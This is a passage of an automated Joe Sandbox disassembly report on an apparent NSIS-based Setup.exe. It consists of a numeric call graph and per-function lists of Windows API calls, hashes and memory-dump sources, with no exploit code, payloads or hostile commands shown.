calls 4757->4758 4758->4756 4759->4746 
4768 406250 4760->4768 4765 402922 4761->4765 4762->4745 4765->4750 4767 4062cf 11 API calls 4767->4765 4769 406273 4768->4769 4770 4062b6 4769->4770 4771 406288 wsprintfW 4769->4771 4772 402991 4770->4772 4773 4062bf lstrcatW 4770->4773 4771->4770 4771->4771 4772->4767 4773->4772 4774 403d02 4775 403d0d 4774->4775 4776 403d11 4775->4776 4777 403d14 GlobalAlloc 4775->4777 4777->4776 4778 402082 4779 401446 18 API calls 4778->4779 4780 402093 SetWindowLongW 4779->4780 4781 4030e3 4780->4781 4782 402a84 4783 401553 19 API calls 4782->4783 4784 402a8e 4783->4784 4785 401446 18 API calls 4784->4785 4786 402a98 4785->4786 4787 401a13 4786->4787 4788 402ab2 RegEnumKeyW 4786->4788 4789 402abe RegEnumValueW 4786->4789 4790 402a7e 4788->4790 4789->4787 4789->4790 4790->4787 4791 4029e4 RegCloseKey 4790->4791 4791->4787 4792 402c8a 4793 402ca2 4792->4793 4794 402c8f 4792->4794 4796 40145c 18 API calls 4793->4796 4795 401446 18 API calls 4794->4795 4798 402c97 4795->4798 4797 402ca9 lstrlenW 4796->4797 4797->4798 4799 401a13 4798->4799 4800 402ccb WriteFile 4798->4800 4800->4799 4801 401d8e 4802 40145c 18 API calls 4801->4802 4803 401d95 ExpandEnvironmentStringsW 4802->4803 4804 401da8 4803->4804 4805 401db9 4803->4805 4804->4805 4806 401dad lstrcmpW 4804->4806 4806->4805 4807 401e0f 4808 401446 18 API calls 4807->4808 4809 401e17 4808->4809 4810 401446 18 API calls 4809->4810 4811 401e21 4810->4811 4812 4030e3 4811->4812 4814 405f7d wsprintfW 4811->4814 4814->4812 4815 40438f 4816 4043c8 4815->4816 4817 40439f 4815->4817 4818 403df6 8 API calls 4816->4818 4819 403d6b 19 API calls 4817->4819 4821 4043d4 4818->4821 4820 4043ac SetDlgItemTextW 4819->4820 4820->4816 4822 403f90 4823 403fa0 4822->4823 4824 403fbc 4822->4824 4833 405cb0 GetDlgItemTextW 4823->4833 4826 403fc2 SHGetPathFromIDListW 4824->4826 4827 403fef 4824->4827 4829 403fd2 4826->4829 4832 403fd9 SendMessageW 4826->4832 4828 403fad SendMessageW 4828->4824 4830 40141d 80 API calls 4829->4830 4830->4832 4832->4827 
4833->4828 4834 402392 4835 40145c 18 API calls 4834->4835 4836 402399 4835->4836 4839 407224 4836->4839 4840 406efe 25 API calls 4839->4840 4841 407244 4840->4841 4842 4023a7 4841->4842 4843 40724e lstrcpynW lstrcmpW 4841->4843 4844 407280 4843->4844 4845 407286 lstrcpynW 4843->4845 4844->4845 4845->4842 3338 402713 3353 406035 lstrcpynW 3338->3353 3340 40272c 3354 406035 lstrcpynW 3340->3354 3342 402738 3343 402743 3342->3343 3344 40145c 18 API calls 3342->3344 3345 40145c 18 API calls 3343->3345 3347 402752 3343->3347 3344->3343 3345->3347 3348 40145c 18 API calls 3347->3348 3350 402761 3347->3350 3348->3350 3355 40145c 3350->3355 3353->3340 3354->3342 3363 406831 3355->3363 3358 401497 3360 4062cf lstrlenW wvsprintfW 3358->3360 3403 406113 3360->3403 3372 40683e 3363->3372 3364 406aab 3365 401488 3364->3365 3398 406035 lstrcpynW 3364->3398 3365->3358 3382 406064 3365->3382 3367 4068ff GetVersion 3377 40690c 3367->3377 3368 406a72 lstrlenW 3368->3372 3370 406831 10 API calls 3370->3368 3372->3364 3372->3367 3372->3368 3372->3370 3375 406064 5 API calls 3372->3375 3396 405f7d wsprintfW 3372->3396 3397 406035 lstrcpynW 3372->3397 3374 40697e GetSystemDirectoryW 3374->3377 3375->3372 3376 406991 GetWindowsDirectoryW 3376->3377 3377->3372 3377->3374 3377->3376 3378 406831 10 API calls 3377->3378 3379 406a0b lstrcatW 3377->3379 3380 4069c5 SHGetSpecialFolderLocation 3377->3380 3391 405eff RegOpenKeyExW 3377->3391 3378->3377 3379->3372 3380->3377 3381 4069dd SHGetPathFromIDListW CoTaskMemFree 3380->3381 3381->3377 3389 406071 3382->3389 3383 4060e7 3384 4060ed CharPrevW 3383->3384 3386 40610d 3383->3386 3384->3383 3385 4060da CharNextW 3385->3383 3385->3389 3386->3358 3388 4060c6 CharNextW 3388->3389 3389->3383 3389->3385 3389->3388 3390 4060d5 CharNextW 3389->3390 3399 405d32 3389->3399 3390->3385 3392 405f33 RegQueryValueExW 3391->3392 3393 405f78 3391->3393 3394 405f55 RegCloseKey 3392->3394 3393->3377 3394->3393 3396->3372 3397->3372 3398->3365 3400 405d38 
3399->3400 3401 405d4e 3400->3401 3402 405d3f CharNextW 3400->3402 3401->3389 3402->3400 3404 40613c 3403->3404 3405 40611f 3403->3405 3407 4061b3 3404->3407 3408 406159 3404->3408 3409 40277f WritePrivateProfileStringW 3404->3409 3406 406129 CloseHandle 3405->3406 3405->3409 3406->3409 3407->3409 3410 4061bc lstrcatW lstrlenW WriteFile 3407->3410 3408->3410 3411 406162 GetFileAttributesW 3408->3411 3410->3409 3416 405e7c GetFileAttributesW CreateFileW 3411->3416 3413 40617e 3413->3409 3414 4061a8 SetFilePointer 3413->3414 3415 40618e WriteFile 3413->3415 3414->3407 3415->3414 3416->3413 4846 402797 4847 40145c 18 API calls 4846->4847 4848 4027ae 4847->4848 4849 40145c 18 API calls 4848->4849 4850 4027b7 4849->4850 4851 40145c 18 API calls 4850->4851 4852 4027c0 GetPrivateProfileStringW lstrcmpW 4851->4852 4853 401e9a 4854 40145c 18 API calls 4853->4854 4855 401ea1 4854->4855 4856 401446 18 API calls 4855->4856 4857 401eab wsprintfW 4856->4857 3817 401a1f 3818 40145c 18 API calls 3817->3818 3819 401a26 3818->3819 3820 4062cf 11 API calls 3819->3820 3821 401a49 3820->3821 3822 401a64 3821->3822 3823 401a5c 3821->3823 3892 406035 lstrcpynW 3822->3892 3891 406035 lstrcpynW 3823->3891 3826 401a6f 3893 40674e lstrlenW CharPrevW 3826->3893 3827 401a62 3830 406064 5 API calls 3827->3830 3861 401a81 3830->3861 3831 406301 2 API calls 3831->3861 3834 401a98 CompareFileTime 3834->3861 3835 401ba9 3836 404f9e 25 API calls 3835->3836 3838 401bb3 3836->3838 3837 401b5d 3839 404f9e 25 API calls 3837->3839 3870 40337f 3838->3870 3841 401b70 3839->3841 3845 4062cf 11 API calls 3841->3845 3843 406035 lstrcpynW 3843->3861 3844 4062cf 11 API calls 3846 401bda 3844->3846 3850 401b8b 3845->3850 3847 401be9 SetFileTime 3846->3847 3848 401bf8 CloseHandle 3846->3848 3847->3848 3848->3850 3851 401c09 3848->3851 3849 406831 18 API calls 3849->3861 3852 401c21 3851->3852 3853 401c0e 3851->3853 3854 406831 18 API calls 3852->3854 3855 406831 18 API calls 3853->3855 3856 401c29 3854->3856 3858 
401c16 lstrcatW 3855->3858 3859 4062cf 11 API calls 3856->3859 3858->3856 3862 401c34 3859->3862 3860 401b50 3864 401b93 3860->3864 3865 401b53 3860->3865 3861->3831 3861->3834 3861->3835 3861->3837 3861->3843 3861->3849 3861->3860 3863 4062cf 11 API calls 3861->3863 3869 405e7c GetFileAttributesW CreateFileW 3861->3869 3896 405e5c GetFileAttributesW 3861->3896 3899 405ccc 3861->3899 3866 405ccc MessageBoxIndirectW 3862->3866 3863->3861 3867 4062cf 11 API calls 3864->3867 3868 4062cf 11 API calls 3865->3868 3866->3850 3867->3850 3868->3837 3869->3861 3871 40339a 3870->3871 3872 4033c7 3871->3872 3905 403368 SetFilePointer 3871->3905 3903 403336 ReadFile 3872->3903 3876 401bc6 3876->3844 3877 403546 3879 40354a 3877->3879 3880 40356e 3877->3880 3878 4033eb GetTickCount 3878->3876 3883 403438 3878->3883 3881 403336 ReadFile 3879->3881 3880->3876 3884 403336 ReadFile 3880->3884 3885 40358d WriteFile 3880->3885 3881->3876 3882 403336 ReadFile 3882->3883 3883->3876 3883->3882 3887 40348a GetTickCount 3883->3887 3888 4034af MulDiv wsprintfW 3883->3888 3890 4034f3 WriteFile 3883->3890 3884->3880 3885->3876 3886 4035a1 3885->3886 3886->3876 3886->3880 3887->3883 3889 404f9e 25 API calls 3888->3889 3889->3883 3890->3876 3890->3883 3891->3827 3892->3826 3894 401a75 lstrcatW 3893->3894 3895 40676b lstrcatW 3893->3895 3894->3827 3895->3894 3897 405e79 3896->3897 3898 405e6b SetFileAttributesW 3896->3898 3897->3861 3898->3897 3900 405ce1 3899->3900 3901 405d2f 3900->3901 3902 405cf7 MessageBoxIndirectW 3900->3902 3901->3861 3902->3901 3904 403357 3903->3904 3904->3876 3904->3877 3904->3878 3905->3872 4858 40209f GetDlgItem GetClientRect 4859 40145c 18 API calls 4858->4859 4860 4020cf LoadImageW SendMessageW 4859->4860 4861 4030e3 4860->4861 4862 4020ed DeleteObject 4860->4862 4862->4861 4863 402b9f 4864 401446 18 API calls 4863->4864 4868 402ba7 4864->4868 4865 402c4a 4866 402bdf ReadFile 4866->4868 4875 402c3d 4866->4875 4867 401446 18 API calls 4867->4875 4868->4865 
4868->4866 4869 402c06 MultiByteToWideChar 4868->4869 4870 402c3f 4868->4870 4871 402c4f 4868->4871 4868->4875 4869->4868 4869->4871 4876 405f7d wsprintfW 4870->4876 4873 402c6b SetFilePointer 4871->4873 4871->4875 4873->4875 4874 402d17 ReadFile 4874->4875 4875->4865 4875->4867 4875->4874 4876->4865 4877 402b23 GlobalAlloc 4878 402b39 4877->4878 4879 402b4b 4877->4879 4880 401446 18 API calls 4878->4880 4881 40145c 18 API calls 4879->4881 4883 402b41 4880->4883 4882 402b52 WideCharToMultiByte lstrlenA 4881->4882 4882->4883 4884 402b84 WriteFile 4883->4884 4885 402b93 4883->4885 4884->4885 4886 402384 GlobalFree 4884->4886 4886->4885 4888 4040a3 4889 4040b0 lstrcpynW lstrlenW 4888->4889 4890 4040ad 4888->4890 4890->4889 3430 4054a5 3431 4055f9 3430->3431 3432 4054bd 3430->3432 3434 40564a 3431->3434 3435 40560a GetDlgItem GetDlgItem 3431->3435 3432->3431 3433 4054c9 3432->3433 3437 4054d4 SetWindowPos 3433->3437 3438 4054e7 3433->3438 3436 4056a4 3434->3436 3444 40139d 80 API calls 3434->3444 3439 403d6b 19 API calls 3435->3439 3445 4055f4 3436->3445 3500 403ddb 3436->3500 3437->3438 3441 405504 3438->3441 3442 4054ec ShowWindow 3438->3442 3443 405634 SetClassLongW 3439->3443 3446 405526 3441->3446 3447 40550c DestroyWindow 3441->3447 3442->3441 3448 40141d 80 API calls 3443->3448 3451 40567c 3444->3451 3449 40552b SetWindowLongW 3446->3449 3450 40553c 3446->3450 3452 405908 3447->3452 3448->3434 3449->3445 3453 4055e5 3450->3453 3454 405548 GetDlgItem 3450->3454 3451->3436 3455 405680 SendMessageW 3451->3455 3452->3445 3461 405939 ShowWindow 3452->3461 3520 403df6 3453->3520 3458 405578 3454->3458 3459 40555b SendMessageW IsWindowEnabled 3454->3459 3455->3445 3456 40141d 80 API calls 3469 4056b6 3456->3469 3457 40590a DestroyWindow KiUserCallbackDispatcher 3457->3452 3463 405585 3458->3463 3466 4055cc SendMessageW 3458->3466 3467 405598 3458->3467 3475 40557d 3458->3475 3459->3445 3459->3458 3461->3445 3462 406831 18 API calls 3462->3469 3463->3466 3463->3475 3465 
403d6b 19 API calls 3465->3469 3466->3453 3470 4055a0 3467->3470 3471 4055b5 3467->3471 3468 4055b3 3468->3453 3469->3445 3469->3456 3469->3457 3469->3462 3469->3465 3491 40584a DestroyWindow 3469->3491 3503 403d6b 3469->3503 3514 40141d 3470->3514 3472 40141d 80 API calls 3471->3472 3474 4055bc 3472->3474 3474->3453 3474->3475 3517 403d44 3475->3517 3477 405731 GetDlgItem 3478 405746 3477->3478 3479 40574f ShowWindow KiUserCallbackDispatcher 3477->3479 3478->3479 3506 403db1 KiUserCallbackDispatcher 3479->3506 3481 405779 EnableWindow 3484 40578d 3481->3484 3482 405792 GetSystemMenu EnableMenuItem SendMessageW 3483 4057c2 SendMessageW 3482->3483 3482->3484 3483->3484 3484->3482 3507 403dc4 SendMessageW 3484->3507 3508 406035 lstrcpynW 3484->3508 3487 4057f0 lstrlenW 3488 406831 18 API calls 3487->3488 3489 405806 SetWindowTextW 3488->3489 3509 40139d 3489->3509 3491->3452 3492 405864 CreateDialogParamW 3491->3492 3492->3452 3493 405897 3492->3493 3494 403d6b 19 API calls 3493->3494 3495 4058a2 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3494->3495 3496 40139d 80 API calls 3495->3496 3497 4058e8 3496->3497 3497->3445 3498 4058f0 ShowWindow 3497->3498 3499 403ddb SendMessageW 3498->3499 3499->3452 3501 403df3 3500->3501 3502 403de4 SendMessageW 3500->3502 3501->3469 3502->3501 3504 406831 18 API calls 3503->3504 3505 403d76 SetDlgItemTextW 3504->3505 3505->3477 3506->3481 3507->3484 3508->3487 3512 4013a4 3509->3512 3510 401410 3510->3469 3512->3510 3513 4013dd MulDiv SendMessageW 3512->3513 3534 4015a0 3512->3534 3513->3512 3515 40139d 80 API calls 3514->3515 3516 401432 3515->3516 3516->3475 3518 403d51 SendMessageW 3517->3518 3519 403d4b 3517->3519 3518->3468 3519->3518 3521 403e0b GetWindowLongW 3520->3521 3531 403e94 3520->3531 3522 403e1c 3521->3522 3521->3531 3523 403e2b GetSysColor 3522->3523 3524 403e2e 3522->3524 3523->3524 3525 403e34 SetTextColor 3524->3525 3526 403e3e SetBkMode 3524->3526 3525->3526 3527 403e56 GetSysColor 3526->3527 3528 
403e5c 3526->3528 3527->3528 3529 403e63 SetBkColor 3528->3529 3530 403e6d 3528->3530 3529->3530 3530->3531 3532 403e80 DeleteObject 3530->3532 3533 403e87 CreateBrushIndirect 3530->3533 3531->3445 3532->3533 3533->3531 3535 4015fa 3534->3535 3614 40160c 3534->3614 3536 401601 3535->3536 3537 401742 3535->3537 3538 401962 3535->3538 3539 4019ca 3535->3539 3540 40176e 3535->3540 3541 401650 3535->3541 3542 4017b1 3535->3542 3543 401672 3535->3543 3544 401693 3535->3544 3545 401616 3535->3545 3546 4016d6 3535->3546 3547 401736 3535->3547 3548 401897 3535->3548 3549 4018db 3535->3549 3550 40163c 3535->3550 3551 4016bd 3535->3551 3535->3614 3560 4062cf 11 API calls 3536->3560 3552 401751 ShowWindow 3537->3552 3553 401758 3537->3553 3557 40145c 18 API calls 3538->3557 3564 40145c 18 API calls 3539->3564 3554 40145c 18 API calls 3540->3554 3578 4062cf 11 API calls 3541->3578 3558 40145c 18 API calls 3542->3558 3555 40145c 18 API calls 3543->3555 3559 401446 18 API calls 3544->3559 3563 40145c 18 API calls 3545->3563 3577 401446 18 API calls 3546->3577 3546->3614 3547->3614 3668 405f7d wsprintfW 3547->3668 3556 40145c 18 API calls 3548->3556 3561 40145c 18 API calls 3549->3561 3565 401647 PostQuitMessage 3550->3565 3550->3614 3562 4062cf 11 API calls 3551->3562 3552->3553 3566 401765 ShowWindow 3553->3566 3553->3614 3567 401775 3554->3567 3568 401678 3555->3568 3569 40189d 3556->3569 3570 401968 GetFullPathNameW 3557->3570 3571 4017b8 3558->3571 3572 40169a 3559->3572 3560->3614 3573 4018e2 3561->3573 3574 4016c7 SetForegroundWindow 3562->3574 3575 40161c 3563->3575 3576 4019d1 SearchPathW 3564->3576 3565->3614 3566->3614 3580 4062cf 11 API calls 3567->3580 3581 4062cf 11 API calls 3568->3581 3659 406301 FindFirstFileW 3569->3659 3583 4019a1 3570->3583 3584 40197f 3570->3584 3585 4062cf 11 API calls 3571->3585 3586 4062cf 11 API calls 3572->3586 3587 40145c 18 API calls 3573->3587 3574->3614 3588 4062cf 11 API calls 3575->3588 3576->3547 3576->3614 3577->3614 3589 401664 
3578->3589 3590 401785 SetFileAttributesW 3580->3590 3591 401683 3581->3591 3603 4019b8 GetShortPathNameW 3583->3603 3583->3614 3584->3583 3609 406301 2 API calls 3584->3609 3593 4017c9 3585->3593 3594 4016a7 Sleep 3586->3594 3595 4018eb 3587->3595 3596 401627 3588->3596 3597 40139d 65 API calls 3589->3597 3598 40179a 3590->3598 3590->3614 3607 404f9e 25 API calls 3591->3607 3641 405d85 CharNextW CharNextW 3593->3641 3594->3614 3604 40145c 18 API calls 3595->3604 3605 404f9e 25 API calls 3596->3605 3597->3614 3606 4062cf 11 API calls 3598->3606 3599 4018c2 3610 4062cf 11 API calls 3599->3610 3600 4018a9 3608 4062cf 11 API calls 3600->3608 3603->3614 3612 4018f5 3604->3612 3605->3614 3606->3614 3607->3614 3608->3614 3613 401991 3609->3613 3610->3614 3611 4017d4 3615 401864 3611->3615 3618 405d32 CharNextW 3611->3618 3636 4062cf 11 API calls 3611->3636 3616 4062cf 11 API calls 3612->3616 3613->3583 3667 406035 lstrcpynW 3613->3667 3614->3512 3615->3591 3617 40186e 3615->3617 3619 401902 MoveFileW 3616->3619 3647 404f9e 3617->3647 3622 4017e6 CreateDirectoryW 3618->3622 3623 401912 3619->3623 3624 40191e 3619->3624 3622->3611 3626 4017fe GetLastError 3622->3626 3623->3591 3630 406301 2 API calls 3624->3630 3640 401942 3624->3640 3628 401827 GetFileAttributesW 3626->3628 3629 40180b GetLastError 3626->3629 3628->3611 3633 4062cf 11 API calls 3629->3633 3634 401929 3630->3634 3631 401882 SetCurrentDirectoryW 3631->3614 3632 4062cf 11 API calls 3635 40195c 3632->3635 3633->3611 3634->3640 3662 406c94 3634->3662 3635->3614 3636->3611 3639 404f9e 25 API calls 3639->3640 3640->3632 3642 405da2 3641->3642 3645 405db4 3641->3645 3644 405daf CharNextW 3642->3644 3642->3645 3643 405dd8 3643->3611 3644->3643 3645->3643 3646 405d32 CharNextW 3645->3646 3646->3645 3648 404fb7 3647->3648 3649 401875 3647->3649 3650 404fd5 lstrlenW 3648->3650 3651 406831 18 API calls 3648->3651 3658 406035 lstrcpynW 3649->3658 3652 404fe3 lstrlenW 3650->3652 3653 404ffe 3650->3653 3651->3650 
3652->3649 3654 404ff5 lstrcatW 3652->3654 3655 405011 3653->3655 3656 405004 SetWindowTextW 3653->3656 3654->3653 3655->3649 3657 405017 SendMessageW SendMessageW SendMessageW 3655->3657 3656->3655 3657->3649 3658->3631 3660 4018a5 3659->3660 3661 406317 FindClose 3659->3661 3660->3599 3660->3600 3661->3660 3669 406328 GetModuleHandleA 3662->3669 3666 401936 3666->3639 3667->3583 3668->3614 3670 406340 LoadLibraryA 3669->3670 3671 40634b GetProcAddress 3669->3671 3670->3671 3672 406359 3670->3672 3671->3672 3672->3666 3673 406ac5 lstrcpyW 3672->3673 3674 406b13 GetShortPathNameW 3673->3674 3675 406aea 3673->3675 3676 406b2c 3674->3676 3677 406c8e 3674->3677 3699 405e7c GetFileAttributesW CreateFileW 3675->3699 3676->3677 3680 406b34 WideCharToMultiByte 3676->3680 3677->3666 3679 406af3 CloseHandle GetShortPathNameW 3679->3677 3681 406b0b 3679->3681 3680->3677 3682 406b51 WideCharToMultiByte 3680->3682 3681->3674 3681->3677 3682->3677 3683 406b69 wsprintfA 3682->3683 3684 406831 18 API calls 3683->3684 3685 406b95 3684->3685 3700 405e7c GetFileAttributesW CreateFileW 3685->3700 3687 406ba2 3687->3677 3688 406baf GetFileSize GlobalAlloc 3687->3688 3689 406bd0 ReadFile 3688->3689 3690 406c84 CloseHandle 3688->3690 3689->3690 3691 406bea 3689->3691 3690->3677 3691->3690 3701 405de2 lstrlenA 3691->3701 3694 406c03 lstrcpyA 3697 406c25 3694->3697 3695 406c17 3696 405de2 4 API calls 3695->3696 3696->3697 3698 406c5c SetFilePointer WriteFile GlobalFree 3697->3698 3698->3690 3699->3679 3700->3687 3702 405e23 lstrlenA 3701->3702 3703 405e2b 3702->3703 3704 405dfc lstrcmpiA 3702->3704 3703->3694 3703->3695 3704->3703 3705 405e1a CharNextA 3704->3705 3705->3702 4891 402da5 4892 4030e3 4891->4892 4893 402dac 4891->4893 4894 401446 18 API calls 4893->4894 4895 402db8 4894->4895 4896 402dbf SetFilePointer 4895->4896 4896->4892 4897 402dcf 4896->4897 4897->4892 4899 405f7d wsprintfW 4897->4899 4899->4892 4900 4049a8 GetDlgItem GetDlgItem 4901 4049fe 7 API calls 4900->4901 4906 
404c16 4900->4906 4902 404aa2 DeleteObject 4901->4902 4903 404a96 SendMessageW 4901->4903 4904 404aad 4902->4904 4903->4902 4907 404ae4 4904->4907 4910 406831 18 API calls 4904->4910 4905 404cfb 4908 404da0 4905->4908 4909 404c09 4905->4909 4914 404d4a SendMessageW 4905->4914 4906->4905 4918 40487a 5 API calls 4906->4918 4931 404c86 4906->4931 4913 403d6b 19 API calls 4907->4913 4911 404db5 4908->4911 4912 404da9 SendMessageW 4908->4912 4915 403df6 8 API calls 4909->4915 4916 404ac6 SendMessageW SendMessageW 4910->4916 4923 404dc7 ImageList_Destroy 4911->4923 4924 404dce 4911->4924 4929 404dde 4911->4929 4912->4911 4919 404af8 4913->4919 4914->4909 4921 404d5f SendMessageW 4914->4921 4922 404f97 4915->4922 4916->4904 4917 404ced SendMessageW 4917->4905 4918->4931 4925 403d6b 19 API calls 4919->4925 4920 404f48 4920->4909 4930 404f5d ShowWindow GetDlgItem ShowWindow 4920->4930 4926 404d72 4921->4926 4923->4924 4927 404dd7 GlobalFree 4924->4927 4924->4929 4933 404b09 4925->4933 4935 404d83 SendMessageW 4926->4935 4927->4929 4928 404bd6 GetWindowLongW SetWindowLongW 4932 404bf0 4928->4932 4929->4920 4934 40141d 80 API calls 4929->4934 4944 404e10 4929->4944 4930->4909 4931->4905 4931->4917 4936 404bf6 ShowWindow 4932->4936 4937 404c0e 4932->4937 4933->4928 4939 404b65 SendMessageW 4933->4939 4940 404bd0 4933->4940 4942 404b93 SendMessageW 4933->4942 4943 404ba7 SendMessageW 4933->4943 4934->4944 4935->4908 4951 403dc4 SendMessageW 4936->4951 4952 403dc4 SendMessageW 4937->4952 4939->4933 4940->4928 4940->4932 4942->4933 4943->4933 4945 404e54 4944->4945 4948 404e3e SendMessageW 4944->4948 4946 404f1f InvalidateRect 4945->4946 4950 404ecd SendMessageW SendMessageW 4945->4950 4946->4920 4947 404f35 4946->4947 4949 4043d9 21 API calls 4947->4949 4948->4945 4949->4920 4950->4945 4951->4909 4952->4906 4953 4030a9 SendMessageW 4954 4030c2 InvalidateRect 4953->4954 4955 4030e3 4953->4955 4954->4955 3906 4038af #17 SetErrorMode OleInitialize 3907 406328 3 API calls 3906->3907 
3908 4038f2 SHGetFileInfoW 3907->3908 3980 406035 lstrcpynW 3908->3980 3910 40391d GetCommandLineW 3981 406035 lstrcpynW 3910->3981 3912 40392f GetModuleHandleW 3913 403947 3912->3913 3914 405d32 CharNextW 3913->3914 3915 403956 CharNextW 3914->3915 3926 403968 3915->3926 3916 403a02 3917 403a21 GetTempPathW 3916->3917 3982 4037f8 3917->3982 3919 403a37 3921 403a3b GetWindowsDirectoryW lstrcatW 3919->3921 3922 403a5f DeleteFileW 3919->3922 3920 405d32 CharNextW 3920->3926 3924 4037f8 11 API calls 3921->3924 3990 4035b3 GetTickCount GetModuleFileNameW 3922->3990 3927 403a57 3924->3927 3925 403a73 3928 403af8 3925->3928 3930 405d32 CharNextW 3925->3930 3966 403add 3925->3966 3926->3916 3926->3920 3933 403a04 3926->3933 3927->3922 3927->3928 4075 403885 3928->4075 3934 403a8a 3930->3934 4082 406035 lstrcpynW 3933->4082 3945 403b23 lstrcatW lstrcmpiW 3934->3945 3946 403ab5 3934->3946 3935 403aed 3938 406113 9 API calls 3935->3938 3936 403bfa 3939 403c7d 3936->3939 3941 406328 3 API calls 3936->3941 3937 403b0d 3940 405ccc MessageBoxIndirectW 3937->3940 3938->3928 3942 403b1b ExitProcess 3940->3942 3944 403c09 3941->3944 3948 406328 3 API calls 3944->3948 3945->3928 3947 403b3f CreateDirectoryW SetCurrentDirectoryW 3945->3947 4083 4067aa 3946->4083 3950 403b62 3947->3950 3951 403b57 3947->3951 3952 403c12 3948->3952 4100 406035 lstrcpynW 3950->4100 4099 406035 lstrcpynW 3951->4099 3956 406328 3 API calls 3952->3956 3959 403c1b 3956->3959 3958 403b70 4101 406035 lstrcpynW 3958->4101 3960 403c69 ExitWindowsEx 3959->3960 3965 403c29 GetCurrentProcess 3959->3965 3960->3939 3964 403c76 3960->3964 3961 403ad2 4098 406035 lstrcpynW 3961->4098 3967 40141d 80 API calls 3964->3967 3969 403c39 3965->3969 4018 405958 3966->4018 3967->3939 3968 406831 18 API calls 3970 403b98 DeleteFileW 3968->3970 3969->3960 3971 403ba5 CopyFileW 3970->3971 3977 403b7f 3970->3977 3971->3977 3972 403bee 3973 406c94 42 API calls 3972->3973 3975 403bf5 3973->3975 3974 406c94 42 API calls 3974->3977 

Control-flow Graph (entry block 004050F9-00405114)
APIs
• GetDlgItem.USER32(?,00000403), ref: 0040515B
• GetDlgItem.USER32(?,000003EE), ref: 0040516A
• GetClientRect.USER32(?,?), ref: 004051C2
• GetSystemMetrics.USER32(00000015), ref: 004051CA
• SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051EB
• SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051FC
• SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040520F
• SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040521D
• SendMessageW.USER32(?,00001024,00000000,?), ref: 00405230
• ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405252
• ShowWindow.USER32(?,00000008), ref: 00405266
• GetDlgItem.USER32(?,000003EC), ref: 00405287
• SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405297
• SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004052AC
• SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004052B8
• GetDlgItem.USER32(?,000003F8), ref: 00405179
  • Part of subcall function 00403DC4: SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
  • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00427D76,759223A0,00000000), ref: 00406902
  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
• GetDlgItem.USER32(?,000003EC), ref: 004052D7
• CreateThread.KERNELBASE(00000000,00000000,Function_00005073,00000000), ref: 004052E5
• CloseHandle.KERNELBASE(00000000), ref: 004052EC
• ShowWindow.USER32(00000000), ref: 00405313
• ShowWindow.USER32(?,00000008), ref: 00405318
• ShowWindow.USER32(00000008), ref: 0040535F
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405391
• CreatePopupMenu.USER32 ref: 004053A2
• AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004053B7
• GetWindowRect.USER32(?,?), ref: 004053CA
• TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053EC
• SendMessageW.USER32(?,00001073,00000000,?), ref: 00405427
• OpenClipboard.USER32(00000000), ref: 00405437
• EmptyClipboard.USER32 ref: 0040543D
• GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 00405449
• GlobalLock.KERNEL32(00000000), ref: 00405453
• SendMessageW.USER32(?,00001073,00000000,?), ref: 00405467
• GlobalUnlock.KERNEL32(00000000), ref: 00405489
• SetClipboardData.USER32(0000000D,00000000), ref: 00405494
• CloseClipboard.USER32 ref: 0040549A
Strings
Memory Dump Source
• Source File: 00000000.00000002.2093717061.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2093686064.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093750393.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093781409.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093781409.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093781409.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093781409.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093781409.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2094366668.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Setup.jbxd
Similarity
• API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
• String ID: New install of "%s" to "%s"${
• API String ID: 2110491804-1641061399
• Opcode ID: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
• Instruction ID: db3ff0878cedf1d1b3e6f9985675ba3e3c8e3ad145c0decdf5c07b0ce3ef5d1a
• Opcode Fuzzy Hash: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
• Instruction Fuzzy Hash: 46B15970900609BFEB11AFA1DD89EAE7B79FB04354F00803AFA05BA1A1C7755E81DF58

Control-flow Graph (entry block 004038AF-00403945)
                                                                                                                                                                              APIs
                                                                                                                                                                              • #17.COMCTL32 ref: 004038CE
                                                                                                                                                                              • SetErrorMode.KERNELBASE(00008001), ref: 004038D9
                                                                                                                                                                              • OleInitialize.OLE32(00000000), ref: 004038E0
                                                                                                                                                                                • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                                                                • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
